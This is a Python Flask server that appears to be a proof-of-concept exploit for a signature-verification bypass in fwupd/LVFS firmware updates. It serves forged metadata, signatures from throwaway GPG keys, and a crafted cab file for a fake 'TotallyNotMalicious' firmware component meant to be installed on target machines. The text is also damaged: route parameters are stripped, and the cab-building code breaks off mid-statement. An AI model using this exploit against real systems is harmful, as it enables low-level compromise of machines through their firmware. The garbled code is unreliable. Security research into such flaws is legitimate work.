#!/usr/bin/env python3 from flask import Flask, Response, url_for import sys import os import gpg import tempfile import gzip import json import hashlib import requests import base64 import struct from shutil import rmtree from functools import lru_cache from lxml import etree from lxml.builder import E app = Flask(__name__) """ We use @lru_cache liberally throughout for two things: 1. To reach out to the real LVFS CDN a minimum number of times 2. To cache things like generation of compressed data which will be signed (re-compressing can break signatures) This POC requires the installation of `python3-gpg` from your OS vendor. It apparently doesn't like being installed via `pip` because it needs to match your system's `libgpgme`. apt install python3-flask python3-gpg python3-lxml """ def create_gpg_context_with_throwaway_signing_key(bits=1024): """ creates a gpgme context with a fresh key set as the signer Returns the context and the filesystem directory that backs it """ gpg_homedir = tempfile.mkdtemp() os.chmod(gpg_homedir, 0o700) c = gpg.Context(armor=True) c.home_dir = gpg_homedir res = c.create_key("Throwaway Key", algorithm="rsa{}".format(bits), sign=True, certify=True, expires=False) c.signers = list(c.keylist(pattern=res.fpr, secret=True))[:1] return c, gpg_homedir def sign_data_with_throwaway_gpg_key(data): c, gpg_homedir = create_gpg_context_with_throwaway_signing_key() signed_data, res = c.sign(data, mode=gpg.constants.sig.mode.NORMAL) rmtree(gpg_homedir) return signed_data.decode() def detached_sign_data_with_throwaway_gpg_key(data): c, gpg_homedir = create_gpg_context_with_throwaway_signing_key() signed_data, res = c.sign(data, mode=gpg.constants.sig.mode.DETACH) rmtree(gpg_homedir) return signed_data.decode() @lru_cache(maxsize=None) def generate_jcat_document(sha1sum, gpg_signature): jcat_message = { "JcatVersionMajor": 0, "JcatVersionMinor": 1, "Items": [ { "Id": "firmware.xml.gz", "Blobs": [ { "Kind": 4, "Flags": 1, "Timestamp": 1587399600, "Data": sha1sum, }, { "Kind": 2, "Flags": 1, "Timestamp": 1587399600, "Data": gpg_signature, } ] } ] } jcat_message_compressed = gzip.compress(json.dumps(jcat_message).encode()) return jcat_message_compressed @lru_cache(maxsize=None) def generate_xml_metadata(): xml = ('\n' '\t&fwupd_poc;\n').encode() return gzip.compress(xml) @lru_cache(maxsize=None) def get_lvfs_detached_signature(): """ gets the current detached GPG signature straight from LVFS. We cache it so we only need to fetch it once. """ url = "https://cdn.fwupd.org/downloads/firmware.xml.gz.asc" ua_string = "fwupd/1.4.1" r = requests.get(url, headers={"User-Agent": ua_string}) return r.text @app.route("/detached_unknown_key/firmware.xml.gz") @app.route("/detached_bad_signature/firmware.xml.gz") @app.route("/bypass/firmware.xml.gz") def serve_metadata(): """Serves a compressed dummy XML document""" xml = generate_xml_metadata() return Response(xml, mimetype="application/gzip") @app.route("/detached_unknown_key/firmware.xml.gz.asc") def serve_detached_gpg_signature_unknown_key(): """ Serves a detached PGP signature, signed by a key unknown to fwupd """ message = b"I am a meaningless message detach-signed by a throwaway key :)\n" signature = detached_sign_data_with_throwaway_gpg_key(message) return Response(signature, mimetype="text/plain") @app.route("/detached_unknown_key/firmware.xml.gz.jcat") def serve_jcat_signature_unknown_key(): """ Serves a jcat document with a detached PGP signature, signed by a key unknown to fwupd """ xml = generate_xml_metadata() jcat_document = generate_jcat_document( sha1sum=hashlib.sha1(xml).hexdigest(), gpg_signature=detached_sign_data_with_throwaway_gpg_key(xml)) return Response(jcat_document, mimetype="application/gzip") @app.route("/detached_bad_signature/firmware.xml.gz.asc") def serve_detached_gpg_signature_bad_sig(): """ Serves a detached PGP signature from LVFS that doesn't match our XML (i.e. should result in "bad signature") """ signature = get_lvfs_detached_signature() return Response(signature, mimetype="text/plain") @app.route("/detached_bad_signature/firmware.xml.gz.jcat") def serve_jcat_signature_bad_sig(): """ Serves a jcat document with a detached PGP signature from LVFS that doesn't match our XML (i.e. should result in "bad signature") """ xml = generate_xml_metadata() jcat_document = generate_jcat_document( sha1sum=hashlib.sha1(xml).hexdigest(), gpg_signature=get_lvfs_detached_signature()) return Response(jcat_document, mimetype="application/gzip") @app.route("/bypass/firmware.xml.gz.asc") @app.route("/poc/uuid//version//updateprotocol//firmware.xml.gz.asc") def serve_bypass_gpg_signature(uuid=None, version=None, update_proto=None): """Serves a normal PGP signature that triggers the verification bypass""" message = (b"I am a message signed by a throwaway key.\n" b"I am NOT a detached signature\n") message_signed = sign_data_with_throwaway_gpg_key(message) return Response(message_signed, mimetype="text/plain") @app.route("/bypass/firmware.xml.gz.jcat") def serve_bypass_jcat_signature(): """ Serves a jcat document with a normal PGP signature that triggers the verification bypass """ xml = generate_xml_metadata() jcat_document = generate_jcat_document( sha1sum=hashlib.sha1(xml).hexdigest(), gpg_signature=sign_data_with_throwaway_gpg_key(b"Hello, world!")) return Response(jcat_document, mimetype="application/gzip") def generate_cab(uuid, version, update_proto): COMPONENT = E.component ID = E.id NAME = E.name SUMMARY = E.summary PROVIDES = E.provides FIRMWARE = E.firmware CUSTOM = E.custom VALUE = E.value RELEASES = E.releases RELEASE = E.release CHECKSUM = E.checksum DESCRIPTION = E.description P = E.p SIZE = E.size REQUIRES = E.requires metainfo_tree = COMPONENT( ID("com.hacker.firmware"), NAME("TotallyNotMalicious"), SUMMARY("This is fine"), PROVIDES( FIRMWARE( uuid, type="flashed", ), ), CUSTOM( VALUE( update_proto, key="LVFS::UpdateProtocol", ), ), RELEASES( RELEASE( DESCRIPTION( P("Totally not malicious ;)"), ), CHECKSUM( filename="empty.dat", target="content", ), SIZE("1337", type="download"), SIZE("0", type="installed"), urgency="high", version=version, timestamp="1587399600", install_duration="120", ), ), REQUIRES(), type="firmware", ) metainfo = etree.tostring(metainfo_tree, pretty_print=True, xml_declaration=True, encoding="UTF-8") # borrowed from def _chunkify(arr, size): """ Split up a bytestream into chunks """ arrs = [] for i in range(0, len(arr), size): chunk = bytearray(arr[i:i + size]) arrs.append(chunk) return arrs # borrowed from def _checksum_compute(content, seed=0): """ Compute the MS cabinet checksum """ csum = seed chunks = _chunkify(content, 4) for chunk in chunks: if len(chunk) == 4: ul = chunk[0] ul |= chunk[1] << 8 ul |= chunk[2] << 16 ul |= chunk[3] << 24 else: # WTF: I can only assume this is a typo from the original # author of the cabinet file specification if len(chunk) == 3: ul = (chunk[0] << 16) | (chunk[1] << 8) | chunk[2] elif len(chunk) == 2: ul = (chunk[0] << 8) | chunk[1] elif len(chunk) == 1: ul = chunk[0] csum ^= ul return csum # *screams internally* # This just barely works to dynamically construct a cab file that is acceptable to fwupd cab = [ B"MSCF", struct.pack("/version//updateprotocol//poc.cab") def serve_cab(uuid, version, update_proto): return Response(generate_cab(uuid, version, update_proto), mimetype="application/cab") @lru_cache(maxsize=None) def generate_custom_metadata(uuid, version, update_proto): """Generates meaningful metadata for use in the end-to-end POC""" COMPONENTS = E.components COMPONENT = E.component ID = E.id NAME = E.name SUMMARY = E.summary PROVIDES = E.provides FIRMWARE = E.firmware CUSTOM = E.custom VALUE = E.value RELEASES = E.releases RELEASE = E.release LOCATION = E.location CHECKSUM = E.checksum DESCRIPTION = E.description P = E.p SIZE = E.size REQUIRES = E.requires metadata_tree = COMPONENTS( COMPONENT( ID("com.hacker.firmware"), NAME("TotallyNotMalicious"), SUMMARY("This is fine"), PROVIDES( FIRMWARE( uuid, type="flashed", ), ), CUSTOM( VALUE( update_proto, key="LVFS::UpdateProtocol", ), ), RELEASES( RELEASE( LOCATION( url_for("serve_cab", _external=True, uuid=uuid, version=version, update_proto=update_proto) ), DESCRIPTION( P("Totally not malicious ;)"), ), CHECKSUM( hashlib.sha1(generate_cab(uuid=uuid, version=version, update_proto=update_proto)).hexdigest(), type="sha1", filename="poc.cab", target="container", ), SIZE("1337", type="download"), SIZE("0", type="installed"), urgency="high", version=version, timestamp="1587399600", install_duration="120", ), ), REQUIRES(), type="firmware", ), origin="lvfs", version="0.9", ) metadata = etree.tostring(metadata_tree, pretty_print=True, xml_declaration=True, encoding="UTF-8") return gzip.compress(metadata) @app.route("/poc/uuid//version//updateprotocol//firmware.xml.gz") def serve_custom_metadata(uuid, version, update_proto): metadata = generate_custom_metadata(uuid, version, update_proto) return Response(metadata, mimetype="application/gzip") @app.route("/poc/uuid//version//updateprotocol//firmware.xml.gz.jcat") def serve_poc_jcat_signature(uuid, version, update_proto): xml = generate_custom_metadata(uuid, version, update_proto) jcat_document = generate_jcat_document( sha1sum=hashlib.sha1(xml).hexdigest(), gpg_signature=sign_data_with_throwaway_gpg_key(b"Hello, world!")) return Response(jcat_document, mimetype="application/gzip") if __name__ == "__main__": try: host = sys.argv[1] port = int(sys.argv[2]) except IndexError: print("Usage: {} ".format(sys.argv[0])) sys.exit(1) app.run(host=host, port=port, debug=False)